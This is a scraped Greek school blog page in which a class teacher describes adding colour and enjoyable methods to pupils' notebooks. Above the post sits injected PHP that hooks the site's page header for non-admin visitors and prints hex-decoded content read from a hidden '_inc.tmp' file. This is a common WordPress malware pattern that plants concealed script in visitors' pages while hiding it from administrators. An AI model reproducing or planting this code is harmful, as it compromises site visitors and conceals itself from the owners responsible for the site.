if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Θέλουμε το χρώμα στη σχολική μας ζωή |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Θέλουμε το χρώμα στη σχολική μας ζωή

Κύρια επιδίωξή μας, ως τμήμα μάθησης του δημόσιου εκπαιδευτικού συστήματος, ήταν να περνάμε όλοι ωραία στη σχολική μας καθημερινότητα. Θελήσαμε να διαμορφώσουμε ένα εκπαιδευτικό πλαίσιο όπου θα χαρακτηριζόταν από τη συμμετοχή όλων των μαθητών σε όλες τις δράσεις αλλά και από ένα δάσκαλο που θα άκουγε τις απόψεις των μαθητών, ακόμη και αυτών που δεν εκδηλώθηκαν ποτέ, και θα προσπαθούσε να κάνει καλύτερη τη ζωή των μαθητών στο σχολείο αλλά και θα επεδίωκε να τους κάνει να περιμένουν με χαρά να έρθουν στο σχολείο και όχι να περιμένουν πότε θα έρθει …το τέλος του σχολικού έτους για να γλυτώσουν.Έτσι μέσα σε όλες μας τις δράσεις αποφασίσαμε να βάλουμε και χρώμα στα τετράδιά μας και όχι μόνο να γράφουμε με ένα μαύρο μολύβι έννοιες, αριθμούς, ορισμούς και άλλα που πολλές φορές μας κάνουν ενδεχομένως τη μαθητική μας ζωή δύσκολη. Εμείς ως εκπαιδευτικοί ξέρουμε πολύ καλά ότι μπορούν οι μαθητές μας να μάθουν όλα αυτά που πρέπει μέσα από διαδικασίες ευχάριστες, σύγχρονες και κυρίως θελκτικές ως προς τη μάθηση. Ας διώξουμε τις παλιές πειθαναγκαστικές μεθόδους που προάγουν την παπαγαλία και την αναγκαστική εκμάθηση εννοιών και όρων.
Ο Δάσκαλος του Ε1 Ηλίας Βλάχος
ακολουθούν φωτογραφίες από τα τετράδια της φιλαναγνωσίας και της ελληνικής γλώσσας, όπου διακρίνονται τα κείμενα των μαθητών τα οποία αποτελούν και σε μερικές περιπτώσεις άγνωστη ορθογραφία (πριν τη διόρθωση).